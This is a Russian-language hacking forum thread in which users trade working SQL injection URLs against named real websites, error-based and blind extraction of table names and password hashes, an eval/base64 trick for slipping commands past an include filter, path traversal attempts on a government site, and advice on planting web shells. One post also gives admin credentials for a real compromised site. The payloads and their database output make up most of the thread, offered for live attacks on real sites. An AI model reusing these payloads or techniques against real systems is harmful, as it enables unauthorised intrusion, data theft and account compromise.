И кто подскажет как юзать это http://www.exploit-db.com/list.php?description=SunOS+5.1
_http://www.adminer.org (http://www.adminer.org)
:.']rst mysql (http://www.sendspace.com/file/85r5f2)
Было дело работал с ним..очень много глюков.

Konqi
Нет функции измeнения!
интересно какие измeнения? а вручную написать влом? update table_name set column_name='blablabla+измeнения' where условия отсева по параметрам какие тебе нужны ;

интересно какие измeнения? а вручную написать влом? update table_name set column_name='blablabla+измeнения' where условия отсева по параметрам какие тебе нужны ;

Gorev в челях экономии времяни, проще скрипт заюзать...

Gorev в челях экономии времяни, проще скрипт заюзать...
заливай тогда пхпмайадмин через шелл одним архивом..

в любом мало-мальски нормальном веб-шелле есть мускул-менеджер. Тут wso лежит, можно и через него

заливай тогда пхпмайадмин через шелл одним архивом..

Шел расспаковывать нехочет архивы!!

Шел расспаковывать нехочет архивы!!
tar -xzvf phpmyadmin.tar
всегда распаковывал архив из шелла..кроме случая где не хватало прав даже на столь примитивную коммандy,но таких случаев на моем веку я видел очень мало

Gorev, если параметр "z", то архив должен быть сжат GZIP'ом, а в твоем случае еще и TAR'ом, тоесть файл примерно такой: phpmyadmin.tar.gz

Gorev, если параметр "z", то архив должен быть сжат GZIP'ом, а в твоем случае еще и TAR'ом, тоесть файл примерно такой: phpmyadmin.tar.gz
mailbrush извини друг не заметил...виноват..написал к примеру...

select *, GREATEST(c_date, t_stamp) AS cw_date from pm_weblog where weblog = 'lib' and status = 'open' and preview != '1' and t_stamp <= '1273942197' and x_stamp >= '1273942197' order by sticky DESC, t_stamp desc limit -C0_5_3', 10

возможно после limit применить union?

возможно после limit применить union?Тут нет, потому что перед limit order by.

1. Тут сразу шелл если есть права.
2. Через подзапросы пытаться если есть вывод ошибки.

Я правильно понимаю что если мы узнаем sess_xxx из темпа или через куки у "жертвы" то подменив у себя на такой же сервер будет считать все $_SESSION['BlaBla'] "жертвы" также и нашими ?
или там IP тоже играет роль ?

можно узнать ли из sql-injection табл типа inforamtion_schema или mysql и т.п. есть ли подключение удалённое в серверру бд? и какой прогой мона подрубить удаёллно к серверу БД!

можно узнать ли из sql-injection табл типа inforamtion_schema или mysql и т.п. есть ли подключение удалённое в серверру бд? и какой прогой мона подрубить удаёллно к серверу БД!

Можно узнать если у пользователя чья скула есть права на чтения inforamtion_schema + там ещё password закриптован md5 или д.р.!

Я правильно понимаю что если мы узнаем sess_xxx из темпа или через куки у "жертвы" то подменив у себя на такой же сервер будет считать все $_SESSION['BlaBla'] "жертвы" также и нашими ?
или там IP тоже играет роль ?

Правильно! А IP зависит от скрипта(CMS), если там проверка Ip есть то ничего не выйдет, так как к каждому юзеру прикреплён свой ip! ;)

можно узнать ли из sql-injection табл типа inforamtion_schema или mysql и т.п. есть ли подключение удалённое в серверру бд? и какой прогой мона подрубить удаёллно к серверу БД!
user()
blablabla@localhost
если localhost то вероятность 90 % что несконнектишься из вне.
А на остальные пробуй, если естественно не внутр сеть.

Кто там лажанул про MD5?
Там обычное mysql хэширование пассов.

http://fragoria.mail.ru/info.php?Id=219+UNION+SELECT+CONCAT(0x3a,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x3a)--
Парни помогите крутануть.

Доброе утро всем форумчанам, суть вопроса: есть форум phorum 5.2.10 и доступ в админку, собственно как шелл залить?

Доброе утро всем форумчанам, суть вопроса: есть форум phorum 5.2.10 и доступ в админку, собственно как шелл залить?
Мельком смотрел двиг, способа заливки не нашел. Если у кого есть наработки(или готовые методы реализации), велкам в ПМ.

Мельком смотрел двиг, способа заливки не нашел. Если у кого есть наработки(или готовые методы реализации), велкам в ПМ.

в админке я разрешил аплоад файлов и добавил тип пхп, в панели управления юзера на форуме файл загрузился..но не знаю куда, когда нажимаю на сам файл, он скачивается...ссылка на файл такого типа http://www.site.ru/forum/file.php?1,file=304,filename=шелл

Gorev

а tamper Data не показывает директорию?

а может просто файлы в этой папке не интерпретируются? :rolleyes:

Как понять? что это?

The used SELECT statements have a different number of columns

в админке я разрешил аплоад файлов и добавил тип пхп, в панели управления юзера на форуме файл загрузился..но не знаю куда, когда нажимаю на сам файл, он скачивается...ссылка на файл такого типа http://www.site.ru/forum/file.php?1,file=304,filename=шелл
дело в том, что файлы в phorum не аплоадятся, а заносятся в БД.

Как понять? что это?

The used SELECT statements have a different number of columns

количество колонок не совпадают

количество колонок не совпадают

http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18/**/

везде подставляю version() и не чего не выводит? Почему?

http://expert-poisk.ru/spravka.php?act=show_cat&cat=30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18/**/

везде подставляю version() и не чего не выводит? Почему?

а минус кто ставит будет?

-30+union+....

вторая Колонка <title></title>

а минус кто ставит будет?

-30+union+....

вторая Колонка <title></title>

спасибо! ;)

http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/**/

узнал я

database() - expert_poisk
version() - 5.0.77
user() - expert_poisk@localhost

дальеше что делать надо?

http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/**/

узнал я

database() - expert_poisk
version() - 5.0.77
user() - expert_poisk@localhost

дальеше что делать надо?

а дальше читать статьи :mad:

а дальше читать статьи :mad:

Кинь сыль плиз?

http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18/**/

узнал я

database() - expert_poisk
version() - 5.0.77
user() - expert_poisk@localhost

дальеше что делать надо?


дальше вытащи имена таблиц,найдешь интересную таблицу(в смысле таблица узеров или админов)

узнай колонки таблицы,а потом select из таблицы..

понял?

дальше вытащи имена таблиц,найдешь интересную таблицу(в смысле таблица узеров или админов)

узнай колонки таблицы,а потом select из таблицы..

понял?

А есть ФАК более менее понятный для новичка!

понял что из базы expert_poisk надо вытащить users!
только как?

http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,users,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18+from+expert_poisk/**/

Пишет:

Table 'expert_poisk.expert_poisk' doesn't exist

Кинь сыль плиз?

ТЫЦ (https://forum.antichat.ru/thread43966.html)

А есть ФАК более менее понятный для новичка!

понял что из базы expert_poisk надо вытащить users!
только как?

http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,users,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18+from+expert_poisk/**/

Пишет:

Table 'expert_poisk.expert_poisk' doesn't exist
Дак expert_poisk это БД а не таблица. Читай что дали выше

CHARACTER_SETS имя таблицы?
Да, но в ней нет юзеров.
Делай так:
http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.TABLES +LIMIT+1,1 /**/
Потом: limit+2,1; limit+3,1 и т.д., пока не найдешь то что тебе нужно.

Или можно так:
http://expert-poisk.ru/spravka.php?act=show_cat&cat=-30+union+select+1,group_concat(TABLE_NAME),3,4,5,6 ,7,8,9,10,11,1 2,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.TABLES /**/
Не забываем про то, что функции group_concat по дефолту ограничение - 1024 символа на вывод.

2CyberHunter, group_concat
и выводит не все таблицы, а сколько позволит ограничение вывода

А это скула?

http://www.modvlad.ru/gallery/list.php?imagelib_cid=www

2geforce, с чего ты взял? Скуллы не вижу, либо мой браузер неверно отображает пагу (со смарта)

собственно вопрос: можно как нибудь узнать полный путь к сайту если вывод ошибок отключен?

http://www.rokk.ru/index.php?cat=50&item=-21%20or%20(select%20count(*)from(select%201%20unio n%20select%202%20union%20select%203)x%20group%20by %20concat(mid((select%20table_name%20from%20inform ation_schema.tables%20limit%2019,1),1,20),floor(ra nd(0)*2)))

SESSION_STATUS1
тут что такое 1 ??
как убрать ?

SESSION_STATUS1
тут что такое 1 ??
как убрать ?

Зачем убирать? Просто не учитывать. А появляется из-за floor(rand(0)*2)

поставь floor(rand(0)*100) - будут другие циферьки

floor(rand(0)*100)>>Query error: Subquery returns more than 1 row

prosto xo4u imeno 1 ubrat ??

a kak ?

floor(rand(0)*100)>>Query error: Subquery returns more than 1 row

prosto xo4u imeno 1 ubrat ??

a kak ?


http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((sel ect+table_name+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

http://www.rokk.ru/index.php?cat=50&item=-21+and+(select+1+from+(select+count(0),concat((sel ect+table_name+from+information_schema.tables+limi t+1,1),floor(rand(0)*2))+from+information_schema.t ables+group+by+2)a)--+

...


PS: Включай уже логику, твой первый вопрос совсем никак не связан со вторым, не "почему 1", а "почему не могу раскрутить" тогда уж

Привет всем.
есть сайт с sql-inj котрые не выдает ошибку но пишет верно или не верно запрос проведен (0 или 1)
Если делаю 1'+and+1=1--+ то выдает 1
Если 1'+and+1=2--+ То 0

Проблема в том что я не могу воспользоваться конструкцией 1'+group+by+1--+ (ну или другое число допустим 50) всегда возвращает 0

Есть вероятность что это MsSQL

как мне быть, что попробовать?

попробуй "ссылку в студию"

Нужна помощь, собственно http://pocketbook.by/index.php?id=306+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--+
А если ставишь минус перед 306, вылетает пустая страница, подскажите где я затупил )

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+

в IPB есть такой фильтр
if ( ! IPS_DB_ALLOW_SUB_SELECTS )
{
# On the spot allowance?
if ( ! $this->allow_sub_select )
{
$_tmp = strtolower( $this->_removeAllQuotes($the_query) );

if ( preg_match( "#(?:/\*|\*/)#i", $_tmp ) )
{
$this->throwFatalError( "You are not allowed to use comments in your SQL query.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}

if ( preg_match( "#[^_a-zA-Z]union[^_a-zA-Z]#s", $_tmp ) )
{
$this->throwFatalError( "UNION query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}
else if ( preg_match_all( "#[^_a-zA-Z](select)[^_a-zA-Z]#s", $_tmp, $matches ) )
{
if ( count( $matches ) > 1 )
{
$this->throwFatalError( "SUB SELECT query joins are not allowed.\nAdd \ipsRegistry::DB()->allow_sub_select=1; before any query construct to allow them\n{$the_query}" );
return false;
}
}
}
}
Есть мысли как его обойти?

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+
Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.

Не понятно

Есть инклуд, в котором режутся следующие символы:

"." (точка)
"/" (слеш)
"[ и ]" (квадратные скобки)
" " (пробел)

Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.

Вот такие вот дела, больше ничего придумать не могу...

Что-то выводит Ответ MySQL сервера: Duplicate entry '5.1.44-community-log1' for key 'group_key'. Не понятно

версия Mysql
Duplicate entry '5.1.44-community-log1' for key 'group_key'

http://pocketbook.by/index.php?id=(select+1+from+(select+count(0),conca t((select+version()),floor(rand(0)*2))+from+inform ation_schema.tables+group+by+2+limit+1)a)--+
Что-то выводит
Ответ MySQL сервера:
Duplicate entry '5.1.44-community-log1' for key 'group_key'.

Не понятно

ну так ты выводишь через blind, выводжишь в ошибку version()
что не понятно? Ты запросил вывести version(), вывело version() o_0

Есть инклуд, в котором режутся следующие символы:

"." (точка)
"/" (слеш)
"[ и ]" (квадратные скобки)
" " (пробел)

Вопрос - как залить шелл, если есть доступ к файлу с PHP-кодом. Тобишь выполнять команды и фукнкции я могу, к примеру echo(`ls`); - выведет список файлов. Но вот никакие аргументы никакой команде не могу передать, т.к. пробел режется. Работа с любыми массивами (к примеру $_GET[]) также отпадает, скобки режутся, а register_globals = Off. Всяческие функции типа copy() тоже не сработают, т.к. в пути к шеллу (а именно в "http://" или "ftp://") есть слеши, которые режутся. Через chr() не могу строку передать - конкатенация (точка) режется.

Вот такие вот дела, больше ничего придумать не могу...

немного не понял, а попробовать в base64 закодировать не вариант? Т.е. eval(base64_decode(aWQ7IGxzIC1sYQ)); 'id; ls -la';
Попробуй, может получится)

Tigger, вот блин. Все перепробовал, а про base64 совсем забыл :) Спасибо :)

Такс, посмотрел знак "=" тоже режется. А он присутствует в конце base64... :(

А, все, нашёл решение :) Щас попробую...

Спасиб, залил :)

А решение - просто в конец строки добавил лишние ";", таким образом, в base64 знаки "=" заменялись на обычные символы, тоесть на их код в базе64.

Такс, посмотрел знак "=" тоже режется. А он присутствует в конце base64... :(

А, все, нашёл решение :) Щас попробую...

дык попробуй код, что я дал!
т.е. без этого знака, я так делал, было все норм!

P.S. только что проверил, знак '=' не обязателен, можно даже без ковычек)

Есть скуля http://www.stockhouse.com/tools/?page=%2Fshfn%2Farticle%2Easp%3FedtID%3D18744'
mssql скуля но select режется =\ что можно предпринять еще ?

вот урл:

http://mvd.gov.by/modules.php?name=../../../../../

ошибка такая:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(modules/../../../../..//copyright.php) is not within the allowed path(s): (/hosting/mvd.gov.by/htdocs/) in /hosting/mvd.gov.by/htdocs/includes/javascript.php on line 59

вроде этого побывал:
../../../../../../../etc/passwd//////////////////[..4095..]
не пашет

что делать?

инклудить то что разрешено в open_basedir

Есть скуля http://www.stockhouse.com/tools/?page=%2Fshfn%2Farticle%2Easp%3FedtID%3D18744'
mssql скуля но select режется =\ что можно предпринять еще ?
че-то у меня сомнения насчет SELECT..
@@version у тебя прокатило?

Имеется сайт, в нем скуля в .... ORDER BY $id

Переборка запроса вроде
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.

Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд?

eD']Имеется сайт, в нем скуля в .... ORDER BY $id

Переборка запроса вроде
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.

Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд?
Ссылку в студию

Ссылку в студию
К сожалению дать не могу, но тут и так все ясно...
Запрос там вида SELECT .... FROM .... ORDER BY $id
$id - не фильтрауется.

[R]eD, вместо user() запрос свой вставляй, типа select+table+where+id='5' только в () запрос возьми

eD']Имеется сайт, в нем скуля в .... ORDER BY $id

Переборка запроса вроде
(id*IF(ASCII(SUBSTRING(USER(),1,1))=113,1,-1))
работает.

Вопрос: как в таком случае использовать (UNION) SELECT? Или любой другой способ сделать выборку из бд?

Все достаточно просто: с помощью подзапросов, вместо user() подставляешь запрос типа (SELECT+password+FROM+users+WHERE+userid='1') и таким образом запрос получается такой:
(id*IF(ASCII(SUBSTRING((SELECT+password+FROM+users +WHERE+userid='1'),1,1))=113,1,-1)), а далее посимвольно перебираешь остальную часть пароля

че-то у меня сомнения насчет SELECT..
@@version у тебя прокатило?
Извращаясь вот что удалось вывести ...
VersionMicrosoft SQL Server 2005 - 9.00.3042.00 (X64)
Feb 10 2007 00:59:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
DbStocks
ServerE3S9\FT0
Userwebguestsql
PrivilegePublic
дальше ничего не получается =\

Интересуют методы заливки шелла на WebAsyst (v.2.4.7)

$mosConfig_user - joomla_user

$mosConfig_password - joomla_user_password

ребят я все правильно понял? :)

где по умолчанию находится админка в Vizzed Board?
Мож кто слышал про такой двиг, лично я с ним сталкиваюсь впервые=)

Провожу запрос вида
?id=-12+union+select+1,3,3,4,5,6,7 FROM mysql.user--+

ответ

SELECT command denied to user 'some_admin'@'localhost' for table 'user'

подскажите как обойтись без SELECT или что-нибудь другое.

Провожу запрос вида
?id=-12+union+select+1,3,3,4,5,6,7 FROM mysql.user--+

ответ

SELECT command denied to user 'some_admin'@'localhost' for table 'user'

подскажите как обойтись без SELECT или что-нибудь другое.


обхода нет,твоему юзеру запрещено работать с базой mysql...

не редкость.

Есть уязвимый сайт, mysql 4-ветки, file_priv:Y
На сайте есть форум, как узнать его базу? Брут не помог.

Есть уязвимый сайт, mysql 4-ветки, file_priv:Y
На сайте есть форум, как узнать его базу? Брут не помог.
прочитать конфиг подключения к бд у форума ?

Есть уязвимый сайт, mysql 4-ветки, file_priv:Y
На сайте есть форум, как узнать его базу? Брут не помог.


если есть доступ к базе mysql то возьми хэши от юзера mysql,брутиш хэш, попадаешь в пма(если есть) , а тут уже смотришь имена баз :)

через
www.jackson[антигугл]mcinnis.com/control/login.php (Admin - jack[антигугл]son:great[антигугл]dane)
Add Agents - photo залил шел
www.jackson[антигугл]mcinnis.com/photo/350.php и 158.php.jpg

открыл, а тут какие-то для меня непонятки - такого еще не встречал - чтение директорий не работает, файлы читать можно только те, что в photo лежат и все.
через wso - safe mode - Glob (list dir) можно смотреть содержимое photo. на других уровнях ничего смотреть нельзя, даже если знать точное имя файла. редактировать и смотреть файлы в photo можно, новые создавать нельзя.

вопросы
- как такое делается ? [нюанс - ведь я шел залил - значит у "того" php все необходимые права были, а тут нету]
- можно ли это обойти и как ? [мне желательно бы спереть пару файликов с корневой диры сайта]

- можно ли создать в photo php-код вида
include("..\index.php")
...
и добавить на место ... какой-то "хитрый" код, который покажет с какими параметрами было подключение к mysql [например все инициализированные переменные и их значения] ? возможно ли это и как ?

через
www.jackson[антигугл]mcinnis.com/control/login.php (Admin - jack[антигугл]son:great[антигугл]dane)
Add Agents - photo залил шел
www.jackson[антигугл]mcinnis.com/photo/350.php и 158.php.jpg

открыл, а тут какие-то для меня непонятки - такого еще не встречал - чтение директорий не работает, файлы читать можно только те, что photo лежат и все.
через wso - safe mode - Glob (list dir) можно смотреть содержимое photo, перейти выше на уровень не получается. редактировать файлы в photo можно, новые создавать нельзя.

вопросы
- как такое делается ? [нюанс - ведь я шел залил - значит у "того" php все необходимые права были, а тут нету]
- можно ли это обойти и как ? [мне желательно бы спереть пару файликов с корневой диры сайта]

- если создать в photo php-код вида include("..\index.php")
...
и добавить на место ... какой нить код, который покажет с какими параметрами было подключение к mysql [например все инициализированные переменные и их значения] ?

ну что непонятного ? нет прав на чтение файлов..

у тя права как то так думаю 700 или 600

так ка ты не создал эти файлы то у тебя права 0

p.s. если шелл не пускает прогулку по папкам,попробуй командную строку,может быть поможет

Konqi
каким образом на одном и том же сайте php-скрипты обладают разными правами ?

команды там тоже не работают. да и вообще я ж ссылку дал - зайди глянь :)